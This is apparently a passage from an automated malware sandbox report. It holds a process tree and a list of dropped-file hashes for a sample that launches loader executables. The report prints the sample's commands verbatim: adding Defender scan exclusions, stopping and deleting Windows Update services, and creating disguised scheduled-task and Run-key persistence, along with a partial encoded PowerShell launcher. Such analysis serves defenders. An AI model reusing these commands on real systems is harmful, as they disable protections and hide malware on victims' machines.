BsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C "wmic path win32_VideoController get name"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C "wmic cpu get name"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name7⤵
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 2883⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv rhW9PRzZrkmM8+DKCWwrAQ.0.21⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4776 -s 6722⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2000 -s 3882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4772 -s 2322⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2416 -s 4202⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2464 -s 6642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 216 -s 7962⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3632 -s 6562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5052 -s 4762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4160 -s 4602⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4188 -s 4762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3760 -s 3882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3820 -s 4882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2656 -s 4122⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2428 -s 7161⤵
- Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1491.tmp.csvFilesize
39KB
MD5a62485432dcb6b6f6c90a93667f2daf0
SHA1d1a8e78f441af957ddba7e6d3921d29cd787ddb9
SHA256cd44eb2bbf8ea31e16cfc2027d1e09367b7b1e6bafd14e4d4ee487bbc4ea8515
SHA512dc81f786d094cabd87cf42df1c03cdbbccc52ce03d063c19f91741d821a252e85412e6fbc10260c5c14c57ff4fd04a61cc7f09ca72a3fbc6f5be20557d37f2b0
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER154D.tmp.txtFilesize
13KB
MD51cdcab387448c30b85e2a7717dc0fb10
SHA17089d1d6f16492a21c07f4b2a104f113fef23998
SHA256e7efcc4f8bc2d0b5efd5eda7f54df9e3e651fbcec6838d99d4fe8e5deea34dde
SHA512669c40273e84b6ad5ac9c511d0e76dff8bf1ffeebcdde38fbacfcfdf2e877e19249b745c4f32882a4456dfa0d3114bab8d4e5cdc40adff0b3ec1493287225f01
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER154E.tmp.csvFilesize
39KB
MD5582b5c5ea2895c550e0759d95e34377f
SHA1e48cd70cbfb681b347f007e58d1c8283532da8a0
SHA2568882c0514baa37fc0d3d573e65a6c0a272c0310199b3429737cace8c9abacae2
SHA51281291ec5ebcc7275c2a39cb75780024832d71f5e65bda9d6ec0acd6dbe76031df792d7352f05d0f6e479809a64a723ddadaf6e5caa293c4f3e7e3630fae28bfd
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1678.tmp.txtFilesize
13KB
MD58a23f4526246194a0f3a77774c5960d1
SHA143720094cd0185c5fb1c84be096459d48aac2aca
SHA256545a39a0eb9c3880028767d1959b993895850185b6f5f9b655c4675d33a6bf94
SHA512fd23ceb45423d607f349ca2f3ef04f37bdac8cc5239c30def670aadd391f4390e453586a6d16ef620f0ab5de46c8934c4ef564b68f31e7c9ce1b670a5f00c8dc
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA5B9.tmp.csvFilesize
37KB
MD51aa06bfa81a9568e9f609b7f1d98dda3
SHA16cf63010aa058a43fa57f9d9b9024dbef58b9885
SHA256e5c5674c41ccee78f321bb9a0a85021ef78d7487970384c4d29a99f6a4d00626
SHA512958a1b23720c8a436462a0689386768b8ce43de8b0e21bb83f35e776013964e58f2459757d048bf8f86d597ecebbcbb53722a43da1132ba02a2defcc7c3a6240
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA5F8.tmp.txtFilesize
13KB
MD517e435d4894e5271eb47a0131e33c69b
SHA1edbb556d44a6f5ac6ec55bb10f58b45130d8ab0f
SHA25633191a1df040fb4da5891ea3f16e671a0f6ef4d0eae3dfee445bd7e90096bc5a
SHA5127c76a32efe8706b2646c280acf47a585c1d0d0100737f4190e36bf153cd69d88e79bf20e610bc547083508417184ba3b0611fe92aa0b57d386e18e6a62fc3666
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC62.tmp.csvFilesize
36KB
MD5592330d2b2a4529905749905aa18d98f
SHA13e87c16842a9cfb5b62dff3edf61b14837f7e196
SHA256ef2ca57a3bdeac5b30f1c2a73a10381298fc2ad166191cfbd1a585deaa822041
SHA512aac42b9775c216782ef64d4bb7a5490d13cd55fd7ab92420e25e85aba2f481b20a4c3d53b991c84fc78798c869d7354568eb1eb0870de8e2df9e4a408a306d62
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERACB1.tmp.txtFilesize
13KB
MD56322a6385a99b5555d3e1a08ff3245e6
SHA144ade31d1fad51be1148b653c6119f301f5d6c2c
SHA256b6efc0f41a4d30c86c76b66312440e4eac81da0371e7595dc6a469585931573f
SHA512813ad75c557291e7190cf910107f818dbdec50f106d04c9e103d6e8e38e69f0fed74cd14bc3473d7593a061ff35a2641173be88c6adf9cdf607723138e5e1753
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB1C3.tmp.csvFilesize
37KB
MD54920ea869f445f77c1b1709eb4066b3f
SHA1f5a00fac1b3d2a793cee04bd2cf091c609ded1d3
SHA256a06ce969e1b7526532129544597dfcd6c2c0e09d83aefa47fa519825d33ddd24
SHA51257ef66ccc68842d3ce4c4737a81c4e58979a976bd57cd7aef2099e9deb3f66f392373a72ad222a0dcd90113f63b50c5eeb567424923882846291fd7d271b30a4
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB1F3.tmp.csvFilesize
37KB
MD573281bae9f54eb3cff9ff2fd29334434
SHA1f1f058f88ce32c1623c97e4217b3ea96c82edf80
SHA25612dab69ccb2bced2afb39a9fc1dfc5d1239986d409408fa948f482a0a775d253
SHA5123c6df4be277a933218ee6133d25cb15e213fcbc94c3e712e13ac1439f81087a40bda7933a65450fb6305a64124af0cade9494239ae3ecef9f518f3042342e904
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB213.tmp.txtFilesize
13KB
MD53b0d86f02bad838f48d8c9c8022255b9
SHA1b0be5108ee8ae6ff7f8e1cbc6c5e3f038d3012c0
SHA256cf4543985626ab86c3210bae7c4d88029d03fe26811806800bad4b8b02fc2895
SHA512757130424333f40193eaffa7d627cd22e81646a9766c16533931be9cee88c60e8a9202d3fd3f126bee4f77c3ba25219e66cba4ad0a2c148d333bd5d9d2d41487
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB233.tmp.txtFilesize
13KB
MD5d8feb28fa64c607bc30e92091cc5bb94
SHA1eb41a856c7a726e7c3f883ecf76753ab4018c113
SHA2566cadc1961006a1bac7346d7e04abc434305af0f36e99d58c5730ad12edd3704f
SHA512d800e1e7a6f09bedb98a58a5c72c6eb9d7b8c1fc2c398ddc1c159a4ca0169126cd3d14ff96f5a08683c4d8f2da58fb9c02e098c926ce02126f93a9709c9e30df
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB949.tmp.csvFilesize
37KB
MD5baddddddcff82daaa8573564e0319bb0
SHA1776730f96f0241aa2ebb0615f0818c9db0b420f1
SHA256b70340822136f05d9df08109fcb087ca1970d23a30259bb045131215ba97c29a
SHA5122742175e0b8ea14726dcad1a9c2777cb3256c7e5e4d6c13c078def954c24d6e77f68ec7b9c3401dd84db52ddc0835e2affd65c7bcd11a5ef86d390619c393d3e
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB998.tmp.txtFilesize
13KB
MD5ebe2abc4557f443aa0d3d3f000eec791
SHA187916ac2b955983c501d6d0b664dc00d52f54693
SHA256176f270ada5b7bf0dd8c66c67c2c92f9a3d01f545f1d6915c7446e0b4a880b8f
SHA512f2c7fa397c1ac8be56d5cdda3ced6dfd0dc4d5320a23c5a7547b72d2e447c711e909fa6a5dfba55434a3922526db255eb97308773a6dae15caaeb7108c80cc5b
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC29.tmp.csvFilesize
36KB
MD570e1853d975e3dac20f1fde69b30420d
SHA14709c307557a908bf9193a12ada238071749d548
SHA256760d02067bfca9895614bc87191270ce55ade1574140b66ac226f6ec52182291
SHA51279d6254d1f00ce6e03c6bf1ab1799c8208bd82c6befd56ede94720757196d1c5cb0346235988bc3afce7578ae59fe70da0eaf5d96deccf20a8bd3b2a4a08c68a
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC78.tmp.txtFilesize
13KB
MD54910c0d57138f0f11882450b5316a4f6
SHA1b0b9d7e89cccdfa5288bee51b8e5e30341fcaf7b
SHA256013eca58d2d3af4b7d8d23830e45acf28720c000f20751b3047781756555bd82
SHA512a63cf179669829f90a4217db4a985b68c7ec1f4ce1c9a9746c6964419c4642fb58171436de6c1e562c40ead38c9144e099b91ffeed288bc2ce5701fd10488510
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC592.tmp.csvFilesize
37KB
MD52507dcf7c3549744a23fe5c1a2c526a4
SHA1be5e25cf166b928f5d8c7c9d6dcb0edbbc9a8cdc
SHA2561e26c366a49c1f7b91509b34250731aebcd98bc7e532e80695327427c44226b4
SHA5123fcfeb87de41d864b852fe6609d7f56f18ad7b1efc9e5deffd046d731260b1cd133aedfd62aa0061d6367dab660cbab2655b3046d56ad8059a869d94ce48eaf3
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5F0.tmp.csvFilesize
37KB
MD56aef6c7ec346a5cc762f9ae807a94d9f
SHA198a61d48127499e37610e65bed5d4bd02742fa69
SHA256cfa84f07cae2c30023e29e56cbe2587a77e1c1cd27dc2d7751b9401af14a323a
SHA51259916c424e892b7d9444327d448587ddf278cc851f8559e198f3569c1bc6be53bc157c7c4fe3f729ebbea08284ceddfbafeb44d01bdecfdf2b7c8f4274af4876
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC601.tmp.txtFilesize
13KB
MD5ff6f2aa13be70c42e750e52a2552815f
SHA19847d4ea99ee66170e0fd9d84c8e7be9d937ed32
SHA256332af49c3605809e0ece3555bf7baf8a67aee65563a926331dfeacfba6242764
SHA51271b7ac121f853b871b9ae76ba8004fb3778077639ebf2fa2fd934c71d52cd4c9ebc3d7fd88ffd740380d09ddb4c2b0f3bff3b6eec9359512936f3e37096f4632
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC70C.tmp.txtFilesize
13KB
MD5278fe051cfbc6c6defc72ccdf96595ab
SHA15e6a297e5b3efce8654cd4e37b7b5e0de154cea8
SHA256c7eb6b0d2d8530cdf52a35a734c14d92cdd9f42f50748989c398cc564926c65a
SHA512f9cec7b9e10672a568e39097fd6e73036751c4532c2f75a12e7198f5cbd6b5f61bdc837060c8fbd46de90b938d4107a7eb7c1be20d3132b5902d4a97c15b35f1
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCFB7.tmp.csvFilesize
36KB
MD58ad5ec7866c3009a4b4c689692a58801
SHA1ed3b134250d4b6742eb608084ac1efd8fc16eac7
SHA25677a76c99098f81e56e82b31fb3e04a3fbfcf8af7c05559d23a5b8560f1b4bf67
SHA512065c195c61ab764e747591fa28b8e49382ad0126ef93fbf490f72ae34d0db2288b034ae2b9f930a8bb96063362fa052d2cb2212fbcd4fbd2554cbdf0f60f2965
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD006.tmp.txtFilesize
13KB
MD5d53bb250b8eaf5c899ebd48a27334050
SHA150d93bf10aa6fd01408f336ba3a016dcf9655988
SHA256261578710d160c7f6f3fc60294f494bbdab3c3408ce6dc4c2b20302718760c08
SHA512cd51bbda97243b8b10c975a730f35b1296145c46e0d5a18feb5a0a16269fe74ed55a8c573510837f5690946e3bd877d01bdb7e10621e7922a217e2dd3da62903
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD77A.tmp.csvFilesize
36KB
MD575d62050306e6a5cfa51f681fdde4510
SHA13f5523db9453ed0ba0a5a4448ac3e3423415958c
SHA25671083f6b46281e2f82e7e37fe12ffed2b6bba8aa0e6920aa87737eee15ec5615
SHA512e795d917971daaa69a72830be7393b3ff7933bceab13f0c5e01503f3c7a9f6bb783641faae60d0d90e08f6b4a86eebce58b3c2702111fdd6ae29a6714cdb4867
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD7C9.tmp.txtFilesize
13KB
MD5530cef2eb08b05f6e364b1830e198da3
SHA1367ddbc9c9287d8e37c5500cf862029fbf82053a
SHA2568916b400e967c35f5c7dde7adddb968612d8e0e9775be5dcb47e6fa622b33b39
SHA512d2768cf93d8b63b5438f62ee0c4e684a3d8ee0ac7f58638ea4d36037c5cb58956cdc61e9f6f691f94bfd0f0ccf7d9210ea69e817e83447e25250f5d95723a3e1
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE23A.tmp.csvFilesize
36KB
MD5412a2db430b93656cc0c7985c05a2213
SHA1a69ab0c1fb632218a89166ebf78797f40ce6c059
SHA256a5be59267897e106b683e8e54c9551614974f265b9570872ceaa57c8c68709fa
SHA51289fb02e84a654dd1a12adbf0403f73c187bfab6171335550cb23f1c838e75496deb59e75967ebc49e31a2810d36deac97c5627ad1cd0061a3234ddd93ab06fc3
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE2B8.tmp.txtFilesize
13KB
MD5ef371f3a8a6e93bc4c73b7a76b433e65
SHA1ed08ca92f64f0209a84fcd0349fd6a0859f5258a
SHA256badb1040052c597c5619eb1c32f7e3e23fe52c4b5293d38371afde918836dfa8
SHA512c5d3422c8fc2091ae665dd55e9d3b73944651e23c3fd615768b91f1144cf352acf63bbe45dc9aeda225e7a40a017cd485aea71ae426630bd9111a7e6156e6b6b
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREEA0.tmp.csvFilesize
36KB
MD50021cbda88b9e91c1bddece237a15551
SHA16b88954746960def5894a880b099cc38fc97518d
SHA256b0747b60c660b0e8db3de38848841b97bbc2b3071e497d5d24e46f30bbb38de7
SHA512cefb69c6ccc56861215aac360a95c7f0cf507827b90421197769202bccc7e566a30b7058efdac19a61d7f079069dcfde4abc62579d7bc2fda56ffc0f374507e8
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREEEF.tmp.txtFilesize
13KB
MD56f2c689cb76cb1e2517a549007473a08
SHA16c3f79e73c5d2407393a9e246fe88820d929a9c4
SHA25675e67313b5d2ead135c2b0448e6033ca36bdfde1d7acc658d535f3ce6bfc689c
SHA512764f78fa3ce280895e00c3915419f31704719f20c64b30391c106992de66c02f7f6c814d75da882b2e4ab2dfe4cf2aa5d95717285223aa37f95269cdfdb67e1b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
19KB
MD537d4e6dc9153c3092b8a8c4059ee1422
SHA1a5bc9d61f65f7c99d6aa208313043eda2389e080
SHA25644298cea8d4086900648d3ef441d5f2d317f6c405cff7248e385802c21de175d
SHA5122b139058bfc1b547cf7904f831af9e5c05061af92dbd0f3489c77d09c6ef23265aa83753655a7a75d742db22d383a911798c192a834f9b9a50d9c36b7028638c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
948B
MD5a7ce8cefc3f798abe5abd683d0ef26dd
SHA1b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA2565e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chkFilesize
8KB
